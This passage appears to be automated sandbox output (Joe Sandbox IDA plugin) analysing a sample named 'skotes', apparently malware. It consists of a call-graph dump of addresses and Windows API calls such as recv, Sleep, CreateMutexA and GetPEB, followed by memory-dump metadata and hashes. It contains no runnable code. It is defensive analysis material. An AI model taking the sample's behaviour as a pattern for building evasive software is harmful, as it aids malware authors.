6cd7a5 9795->9802 9798 6cd82e 9796->9798 9799->9802 9801 6cd62b __cftof 3 API calls 9801->9795 9802->9791 9803 6ca671 __cftof 3 API calls 9802->9803 9803->9791 9805 6c64c7 __cftof 3 API calls 9804->9805 9806 6c65fe 9805->9806 9808 6ca671 __cftof 3 API calls 9807->9808 9809 6cd630 9808->9809 9809->9801 9811 6cf5b7 __cftof 9810->9811 9812 6ca671 __cftof 3 API calls 9811->9812 9814 6cf5c0 __cftof 9812->9814 9813 6cf606 9813->9778 9814->9813 9815 6c8bec __cftof 3 API calls 9814->9815 9816 6cf62b 9815->9816 9818 6ca671 __cftof 3 API calls 9817->9818 9819 6ce6bb 9818->9819 9822 6ce5c9 9819->9822 9821 6ce6c1 9821->9782 9823 6ce5d5 __cftof ___free_lconv_mon 9822->9823 9824 6ce5f6 9823->9824 9825 6c8bec __cftof 3 API calls 9823->9825 9824->9821 9826 6ce668 9825->9826 9830 6ce6a4 9826->9830 9831 6ca72e 9826->9831 9830->9821 9835 6ca739 __dosmaperr ___free_lconv_mon 9831->9835 9832 6c8bec __cftof 3 API calls 9833 6ca7c7 9832->9833 9834 6ca7be 9836 6ce4b0 9834->9836 9835->9832 9835->9834 9837 6ce5c9 __cftof 3 API calls 9836->9837 9838 6ce4c3 9837->9838 9843 6ce259 9838->9843 9840 6ce4cb __cftof 9841 6ce4dc __cftof __dosmaperr ___free_lconv_mon 9840->9841 9846 6ce6c4 9840->9846 9841->9830 9844 6c690a __cftof GetPEB ExitProcess GetPEB 9843->9844 9845 6ce26b 9844->9845 9845->9840 9847 6ce259 __cftof GetPEB ExitProcess GetPEB 9846->9847 9850 6ce6e4 __cftof 9847->9850 9848 6ce75a __cftof __floor_pentium4 9848->9841 9849 6ce32f __cftof GetPEB ExitProcess GetPEB 9849->9848 9850->9848 9850->9849 9852 6c690a __cftof 3 API calls 9851->9852 9854 6cb6be 9852->9854 9853 6cb6ce __floor_pentium4 9853->9770 9854->9853 9861 6cf1bf 9854->9861 9857 6ca671 __cftof 3 API calls 9856->9857 9858 6cb688 9857->9858 9859 6cb5fb __cftof 3 API calls 9858->9859 9860 6cb698 9859->9860 9860->9770 9862 6c690a __cftof 3 API calls 9861->9862 9863 6cf1df __cftof __freea __floor_pentium4 9862->9863 9863->9853 9865 692296 9864->9865 9868 6c87f8 9865->9868 9871 6c7609 9868->9871 9870 6922a4 9870->9722 9872 6c7649 9871->9872 9876 6c7631 __cftof __dosmaperr __floor_pentium4 9871->9876 9873 6c690a __cftof 3 API calls 9872->9873 9872->9876 9874 6c7661 9873->9874 9877 6c7bc4 9874->9877 9876->9870 9879 6c7bd5 9877->9879 9878 6c7be4 __cftof __dosmaperr 9878->9876 9879->9878 9884 6c8168 9879->9884 9889 6c7dc2 9879->9889 9894 6c7de8 9879->9894 9904 6c7f36 9879->9904 9885 6c8178 9884->9885 9886 6c8171 9884->9886 9885->9879 9913 6c7b50 9886->9913 9888 6c8177 9888->9879 9890 6c7dcb 9889->9890 9891 6c7dd2 9889->9891 9892 6c7b50 3 API calls 9890->9892 9891->9879 9893 6c7dd1 9892->9893 9893->9879 9895 6c7e09 __cftof __dosmaperr 9894->9895 9899 6c7def 9894->9899 9895->9879 9896 6c7f69 9902 6c7f77 9896->9902 9903 6c7f8b 9896->9903 9931 6c8241 9896->9931 9898 6c7fa2 9898->9903 9927 6c8390 9898->9927 9899->9895 9899->9896 9899->9898 9899->9902 9902->9903 9935 6c86ea 9902->9935 9903->9879 9906 6c7f69 9904->9906 9907 6c7f4f 9904->9907 9905 6c7f77 9910 6c7f8b 9905->9910 9912 6c86ea 3 API calls 9905->9912 9906->9905 9908 6c8241 3 API calls 9906->9908 9906->9910 9907->9905 9907->9906 9909 6c7fa2 9907->9909 9908->9905 9909->9910 9911 6c8390 3 API calls 9909->9911 9910->9879 9911->9905 9912->9910 9914 6c7b62 __dosmaperr 9913->9914 9917 6c8ab6 9914->9917 9916 6c7b85 __dosmaperr 9916->9888 9918 6c8ad1 9917->9918 9921 6c8868 9918->9921 9920 6c8adb 9920->9916 9922 6c887a 9921->9922 9923 6c690a __cftof GetPEB ExitProcess GetPEB 9922->9923 9926 6c888f __cftof __dosmaperr 9922->9926 9925 6c88bf 9923->9925 9924 6c6d52 GetPEB ExitProcess GetPEB 9924->9925 9925->9924 9925->9926 9926->9920 9929 6c83ab 9927->9929 9928 6c83dd 9928->9902 9929->9928 9939 6cc88e 9929->9939 9932 6c825a 9931->9932 9946 6cd3c8 9932->9946 9934 6c830d 9934->9902 9934->9934 9936 6c875d __floor_pentium4 9935->9936 9938 6c8707 9935->9938 9936->9903 9937 6cc88e __cftof 3 API calls 9937->9938 9938->9936 9938->9937 9942 6cc733 9939->9942 9941 6cc8a6 9941->9928 9943 6cc743 9942->9943 9944 6c690a __cftof GetPEB ExitProcess GetPEB 9943->9944 9945 6cc748 __cftof __dosmaperr 9943->9945 9944->9945 9945->9941 9947 6cd3d8 __cftof __dosmaperr 9946->9947 9950 6cd3ee 9946->9950 9947->9934 9948 6cd485 9952 6cd4ae 9948->9952 9953 6cd4e4 9948->9953 9949 6cd48a 9959 6ccbdf 9949->9959 9950->9947 9950->9948 9950->9949 9954 6cd4cc 9952->9954 9955 6cd4b3 9952->9955 9976 6ccef8 9953->9976 9972 6cd0e2 9954->9972 9965 6cd23e 9955->9965 9960 6ccbf1 9959->9960 9961 6c690a __cftof GetPEB ExitProcess GetPEB 9960->9961 9962 6ccc05 9961->9962 9963 6ccef8 GetPEB ExitProcess GetPEB 9962->9963 9964 6ccc0d __alldvrm __cftof __dosmaperr _strrchr 9962->9964 9963->9964 9964->9947 9968 6cd26c 9965->9968 9966 6cd2a5 9966->9947 9967 6cd2de 9969 6ccf9a GetPEB ExitProcess GetPEB 9967->9969 9968->9966 9968->9967 9970 6cd2b7 9968->9970 9969->9966 9971 6cd16d GetPEB ExitProcess GetPEB 9970->9971 9971->9966 9973 6cd10f 9972->9973 9974 6cd14e 9973->9974 9975 6cd16d GetPEB ExitProcess GetPEB 9973->9975 9974->9947 9975->9974 9977 6ccf10 9976->9977 9978 6ccf75 9977->9978 9979 6ccf9a GetPEB ExitProcess GetPEB 9977->9979 9978->9947 9979->9978 9981 69907f 9980->9981 9982 695c10 3 API calls 9981->9982 9983 69909a shared_ptr __floor_pentium4 9982->9983 9983->9732 10254 699ab8 10256 699acc 10254->10256 10257 699b08 10256->10257 10258 695c10 3 API calls 10257->10258 10259 699b7c 10258->10259 10260 698b30 3 API calls 10259->10260 10261 699b8d 10260->10261 10262 695c10 3 API calls 10261->10262 10263 699cb1 10262->10263 10264 698b30 3 API calls 10263->10264 10265 699cc2 10264->10265 10469 6c8bbe 10470 6c8868 3 API calls 10469->10470 10471 6c8bdc 10470->10471 10266 6942b0 10269 693ac0 10266->10269 10268 6942bb shared_ptr 10271 693af9 10269->10271 10270 693b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10270->10268 10271->10270 10273 6932d0 5 API calls 10271->10273 10274 693c38 10271->10274 10272 6932d0 5 API calls 10276 693c5f 10272->10276 10273->10274 10274->10272 10274->10276 10275 693c68 10275->10268 10276->10275 10277 693810 3 API calls 10276->10277 10278 693cdb shared_ptr 10277->10278 10278->10268 10292 693970 10293 6ac68b __Mtx_init_in_situ 2 API calls 10292->10293 10294 6939a7 10293->10294 10295 6ac68b __Mtx_init_in_situ 2 API calls 10294->10295 10296 6939e6 10295->10296 10297 692170 10300 6ac6fc 10297->10300 10299 69217a 10301 6ac724 10300->10301 10302 6ac70c 10300->10302 10301->10299 10302->10301 10304 6acfbe 10302->10304 10305 6accd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10304->10305 10306 6acfd0 10305->10306 10306->10302 10448 6955f0 10449 695610 10448->10449 10450 6922c0 3 API calls 10449->10450 10451 695710 __floor_pentium4 10449->10451 10450->10449 10452 6943f0 10453 6abedf InitOnceExecuteOnce 10452->10453 10454 69440a 10453->10454 10455 694411 10454->10455 10456 6c6cbb 3 API calls 10454->10456 10457 694424 10456->10457 10157 6a9ef0 10158 6a9f0c 10157->10158 10159 6ac68b __Mtx_init_in_situ 2 API calls 10158->10159 10160 6a9f17 10159->10160 9984 694276 9987 692410 9984->9987 9986 69427f 9988 692424 9987->9988 9991 6ab52d 9988->9991 9999 6c3aed 9991->9999 9993 69242a 9993->9986 9994 6ab5a5 ___std_exception_copy 10006 6ab1ad 9994->10006 9995 6ab598 10002 6aaf56 9995->10002 10010 6c4f29 9999->10010 10003 6aaf9f ___std_exception_copy 10002->10003 10005 6aafb2 shared_ptr 10003->10005 10017 6ab39f 10003->10017 10005->9993 10007 6ab1d8 10006->10007 10009 6ab1e1 shared_ptr 10006->10009 10008 6ab39f 4 API calls 10007->10008 10008->10009 10009->9993 10012 6c4f2e __cftof 10010->10012 10011 6ab555 10011->9993 10011->9994 10011->9995 10012->10011 10013 6cd634 __cftof 3 API calls 10012->10013 10016 6c8bfc __cftof 10012->10016 10013->10016 10014 6c65ed __cftof 3 API calls 10015 6c8c2f 10014->10015 10016->10014 10028 6abedf 10017->10028 10020 6ab3e8 10020->10005 10037 6acc31 10028->10037 10031 6c6cbb 10032 6c6cc7 __cftof 10031->10032 10033 6ca671 __cftof 3 API calls 10032->10033 10035 6c6ccc 10033->10035 10034 6c8bec __cftof 3 API calls 10036 6c6cf6 10034->10036 10035->10034 10038 6acc3f InitOnceExecuteOnce 10037->10038 10040 6ab3e1 10037->10040 10038->10040 10040->10020 10040->10031 10279 693c8e 10280 693c98 10279->10280 10281 692410 4 API calls 10280->10281 10282 693ca5 10280->10282 10281->10282 10283 693810 3 API calls 10282->10283 10284 693ccf 10283->10284 10285 693810 3 API calls 10284->10285 10286 693cdb shared_ptr 10285->10286 10041 6c6a44 10042 6c6a5c 10041->10042 10043 6c6a52 10041->10043 10046 6c698d 10042->10046 10045 6c6a76 ___free_lconv_mon 10047 6c690a __cftof 3 API calls 10046->10047 10048 6c699f 10047->10048 10048->10045 10130 692e00 10131 692e28 10130->10131 10134 6ac68b 10131->10134 10137 6ac3d5 10134->10137 10136 692e33 10138 6ac3eb 10137->10138 10139 6ac3e1 10137->10139 10138->10136 10140 6ac3be 10139->10140 10141 6ac39e 10139->10141 10150 6acd0a 10140->10150 10141->10138 10146 6accd5 10141->10146 10144 6ac3d0 10144->10136 10147 6acce3 InitializeCriticalSectionEx 10146->10147 10149 6ac3b7 10146->10149 10147->10149 10149->10136 10151 6acd1f RtlInitializeConditionVariable 10150->10151 10151->10144 10161 692ec0 10162 692f06 10161->10162 10165 692f6f 10161->10165 10163 6ac6ac GetSystemTimePreciseAsFileTime 10162->10163 10164 692f12 10163->10164 10167 69301e 10164->10167 10170 692f1d __Mtx_unlock 10164->10170 10166 692fef 10165->10166 10172 6ac6ac GetSystemTimePreciseAsFileTime 10165->10172 10168 6ac26a 4 API calls 10167->10168 10169 693024 10168->10169 10171 6ac26a 4 API calls 10169->10171 10170->10165 10170->10169 10173 692fb9 10171->10173 10172->10173 10174 6ac26a 4 API calls 10173->10174 10175 692fc0 __Mtx_unlock 10173->10175 10174->10175 10176 6ac26a 4 API calls 10175->10176 10178 692fd8 __Cnd_broadcast 10175->10178 10176->10178 10177 6ac26a 4 API calls 10179 69303c 10177->10179 10178->10166 10178->10177 10180 6ac6ac GetSystemTimePreciseAsFileTime 10179->10180 10188 693080 shared_ptr __Mtx_unlock 10180->10188 10181 6931c5 10182 6ac26a 4 API calls 10181->10182 10183 6931cb 10182->10183 10184 6ac26a 4 API calls 10183->10184 10185 6931d1 10184->10185 10186 6ac26a 4 API calls 10185->10186 10192 693193 __Mtx_unlock 10186->10192 10187 6931a7 __floor_pentium4 10188->10181 10188->10183 10188->10187 10191 6ac6ac GetSystemTimePreciseAsFileTime 10188->10191 10189 6ac26a 4 API calls 10190 6931dd 10189->10190 10193 69315f 10191->10193 10192->10187 10192->10189 10193->10181 10193->10185 10193->10192 10194 6abd4c GetSystemTimePreciseAsFileTime 10193->10194 10194->10193 10198 69e0c0 recv 10199 69e122 recv 10198->10199 10200 69e157 recv 10199->10200 10202 69e191 10200->10202 10201 69e2b3 __floor_pentium4 10202->10201 10203 6ac6ac GetSystemTimePreciseAsFileTime 10202->10203 10204 69e2ee 10203->10204 10205 6ac26a 4 API calls 10204->10205 10206 69e358 10205->10206 10472 698980 10474 6989d8 shared_ptr 10472->10474 10475 698aea 10472->10475 10473 695c10 3 API calls 10473->10474 10474->10473 10474->10475 10207 6ad0c7 10208 6ad0d7 10207->10208 10209 6ad17f 10208->10209 10210 6ad17b RtlWakeAllConditionVariable 10208->10210 10333 699f44 10335 699f4c shared_ptr 10333->10335 10334 69a953 Sleep CreateMutexA 10336 69a98e 10334->10336 10335->10334 10337 69a01f shared_ptr 10335->10337 10049 693c47 10050 693c51 10049->10050 10052 693c5f 10050->10052 10056 6932d0 10050->10056 10051 693c68 10052->10051 10075 693810 10052->10075 10079 6ac6ac 10056->10079 10058 69336b 10085 6ac26a 10058->10085 10060 69333c __Mtx_unlock 10062 6ac26a 4 API calls 10060->10062 10064 693350 __floor_pentium4 10060->10064 10065 693377 10062->10065 10063 693314 10063->10058 10063->10060 10082 6abd4c 10063->10082 10064->10052 10066 6ac6ac GetSystemTimePreciseAsFileTime 10065->10066 10067 6933af 10066->10067 10068 6ac26a 4 API calls 10067->10068 10069 6933b6 __Cnd_broadcast 10067->10069 10068->10069 10070 6ac26a 4 API calls 10069->10070 10071 6933d7 __Mtx_unlock 10069->10071 10070->10071 10072 6ac26a 4 API calls 10071->10072 10073 6933eb 10071->10073 10074 69340e 10072->10074 10073->10052 10074->10052 10076 69381c 10075->10076 10122 692440 10076->10122 10089 6ac452 10079->10089 10081 6ac6b9 10081->10063 10106 6abb72 10082->10106 10084 6abd5c 10084->10063 10086 6ac292 10085->10086 10087 6ac274 10085->10087 10086->10086 10087->10086 10112 6ac297 10087->10112 10090 6ac4a8 10089->10090 10092 6ac47a __floor_pentium4 10089->10092 10090->10092 10095 6acf6b 10090->10095 10092->10081 10093 6ac4fd __Xtime_diff_to_millis2 10093->10092 10094 6acf6b _xtime_get GetSystemTimePreciseAsFileTime 10093->10094 10094->10093 10096 6acf7a 10095->10096 10098 6acf87 __aulldvrm 10095->10098 10096->10098 10099 6acf44 10096->10099 10098->10093 10102 6acbea 10099->10102 10103 6acbfb GetSystemTimePreciseAsFileTime 10102->10103 10104 6acc07 10102->10104 10103->10104 10104->10098 10107 6abb9c 10106->10107 10108 6acf6b _xtime_get GetSystemTimePreciseAsFileTime 10107->10108 10111 6abba4 __Xtime_diff_to_millis2 __floor_pentium4 10107->10111 10109 6abbcf __Xtime_diff_to_millis2 10108->10109 10110 6acf6b _xtime_get GetSystemTimePreciseAsFileTime 10109->10110 10109->10111 10110->10111 10111->10084 10115 692ae0 10112->10115 10114 6ac2ae Concurrency::cancel_current_task 10116 6abedf InitOnceExecuteOnce 10115->10116 10117 692af4 __cftof 10116->10117 10117->10114 10118 6ca671 __cftof 3 API calls 10117->10118 10121 6c6ccc 10118->10121 10119 6c8bec __cftof 3 API calls 10120 6c6cf6 10119->10120 10121->10119 10125 6ab5d6 10122->10125 10124 692472 10127 6ab5f1 Concurrency::cancel_current_task 10125->10127 10126 6c8bec __cftof 3 API calls 10128 6ab69f 10126->10128 10127->10126 10129 6ab658 __cftof __floor_pentium4 10127->10129 10129->10124 10338 69215a 10339 6ac6fc InitializeCriticalSectionEx 10338->10339 10340 692164 10339->10340 10211 699adc 10212 699aea 10211->10212 10216 699afe shared_ptr 10211->10216 10213 69a917 10212->10213 10212->10216 10214 69a953 Sleep CreateMutexA 10213->10214 10215 69a98e 10214->10215 10217 695c10 3 API calls 10216->10217 10218 699b7c 10217->10218 10225 698b30 10218->10225 10220 699b8d 10221 695c10 3 API calls 10220->10221 10222 699cb1 10221->10222 10223 698b30 3 API calls 10222->10223 10224 699cc2 10223->10224 10226 698b7c 10225->10226 10227 695c10 3 API calls 10226->10227 10229 698b97 shared_ptr 10227->10229 10228 698d01 shared_ptr __floor_pentium4 10228->10220 10229->10228 10230 695c10 3 API calls 10229->10230 10232 698d9a shared_ptr 10230->10232 10231 698e7e shared_ptr __floor_pentium4 10231->10220 10232->10231 10233 695c10 3 API calls 10232->10233 10234 698f1a shared_ptr __floor_pentium4 10233->10234 10234->10220 10476 693f9f 10477 693fad 10476->10477 10478 693fb6 10476->10478 10479 692410 4 API calls 10477->10479 10479->10478 10400 692b10 10401 692b1a 10400->10401 10402 692b1c 10400->10402 10403 6ac26a 4 API calls 10402->10403 10404 692b22 10403->10404 10480 692b90 10481 692bce 10480->10481 10482 6ab7fb TpReleaseWork 10481->10482 10483 692bdb shared_ptr __floor_pentium4 10482->10483 10405 6ad111 10406 6ad122 10405->10406 10408 6ad12a 10406->10408 10409 6ad199 10406->10409 10410 6ad1a7 SleepConditionVariableCS 10409->10410 10412 6ad1c0 10409->10412 10410->10412 10412->10406 9696 69a856 9697 69a870 9696->9697 9698 69a892 shared_ptr 9696->9698 9697->9698 9699 69a953 Sleep CreateMutexA 9697->9699 9700 69a98e 9699->9700

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 006C652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 342 6c652b-6c6538 call 6ca302 345 6c655a-6c656c call 6c656d ExitProcess 342->345 346 6c653a-6c6548 GetPEB 342->346 346->345 347 6c654a-6c6559 346->347 347->345
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,006C652A,?,?,?,?,?,006C7661), ref: 006C6567
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                          • Opcode ID: fcf1ead6b8b4cbe4c5ea319f6e849bdd09b845699d4ad88fb12a0417444cabb6
                                                                                                                                                                                                                                          • Instruction ID: ef39d1cebc0042485dc19b32d9799831e2ed0368eb82d71770341ecf3419f078
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcf1ead6b8b4cbe4c5ea319f6e849bdd09b845699d4ad88fb12a0417444cabb6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CE08630001148AFCE25BF14C859EA83B5AEF11749F900818F80886222CB75ED42C648
                                                                                                                                                                                                                                          Function 00699BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
